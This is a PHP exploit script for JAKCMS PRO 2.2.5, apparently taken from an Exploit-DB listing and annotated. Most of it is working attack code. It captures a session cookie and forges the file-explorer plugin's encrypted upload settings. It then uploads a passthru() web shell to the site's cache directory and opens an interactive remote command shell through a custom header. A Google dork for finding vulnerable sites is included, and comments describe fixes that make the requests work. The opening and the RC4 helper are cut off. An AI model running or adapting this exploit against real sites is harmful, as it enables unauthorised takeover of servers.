JAKCMS PRO



# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 n";

print "nExample....: php $argv[0] localhost /";

print "nExample....: php $argv[0] localhost /jakcms/n";

die();

}

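$host = $argv[1];
$path = $argv[2];   // web path of the JAKCMS install, with leading and trailing "/" (see usage examples above)

// Step 1: fetch the site's front page only to obtain a PHPSESSID cookie.
// The upload request further down is sent under this session, and its forged
// "get" parameter names the session variable "jak_lastURL" -- presumably (the
// server side is not shown in this listing) the plugin only checks that such a
// variable exists, and a plain front-page visit appears to be enough to set it.
// Line terminators are CRLF: the published listing had lost its backslashes
// ("rn" instead of "\r\n"), which made every request here malformed.
$packet  = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

$response = http_send($host, $packet);

// Fail loudly instead of reading an undefined $m[1] when no cookie came back
// (wrong host/path, or a front page that does not start a session).
if (!preg_match("/PHPSESSID=([^;]*);/i", $response, $m)) die("\n[-] No PHPSESSID cookie in the response, check host and path!\n");

$sid = $m[1];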

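// Step 2: multipart body for the jakadminexplorer "upload" action.
// Field "edit1" carries the extension the plugin appends (".php"), field
// "input1" the file content. The dropped stub reads a base64 command from the
// custom "Cmd" request header, runs it through passthru() and prints the
// output right after a "_code_" marker so the client can cut it out of the
// HTTP response. The stub is a single-quoted literal so its "$" and "{" are
// not interpolated on the attacker side (the listing had lost the backslashes
// that originally escaped them, and "<?php" had been rendered as "< ?php").
$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";
$payload .= '<?php ${error_reporting(0)}.${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))} ?>' . "\r\n";
$payload .= "--o0oOo0o--\r\n";

// The plugin's "get" parameter is RC4-encrypted and hex-encoded. RC4() -- and
// whatever key it uses -- is defined earlier in the exploit, outside this
// excerpt; the point of the bug is that the client can produce a valid value
// itself, so the "encrypted" settings are attacker-controlled:
// upload_filetype=php is evidently taken as the permitted extension and dir=
// points the upload at the web-reachable cache/ directory.
$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));

$packet  = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";   // byte length, which is what the header wants
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

// The plugin signals a rejected upload with the word "Error" in its reply.
if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");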

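// Step 3: interactive shell against the dropped cache/sh.php.
// Each command travels base64-encoded in the custom "Cmd" header of a GET; the
// stub's output follows the "_code_" marker in the response body.
// The request is rebuilt per command instead of going through sprintf(), so a
// literal "%" in $path can no longer be mis-parsed as a format directive.
// CRLF terminators restored (the listing had "rn" for "\r\n").
while (1)
{
    print "\njakcms-shell# ";

    $line = fgets(STDIN);
    if ($line === false) break;      // EOF on stdin (Ctrl-D): leave instead of spinning on empty commands

    $cmd = trim($line);
    if ($cmd === "exit") break;

    $encoded = base64_encode($cmd);

    $packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cmd: {$encoded}\r\n";
    $packet .= "Connection: close\r\n\r\n";

    // No marker means the stub is gone or never executed as PHP.
    if (!preg_match("/_code_(.*)/s", http_send($host, $packet), $m)) die("\n[-] Exploit failed!\n");

    print $m[1];
}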

?>

Source (original listing, EDB-ID 17882): http://www.exploit-db.com/exploits/17882/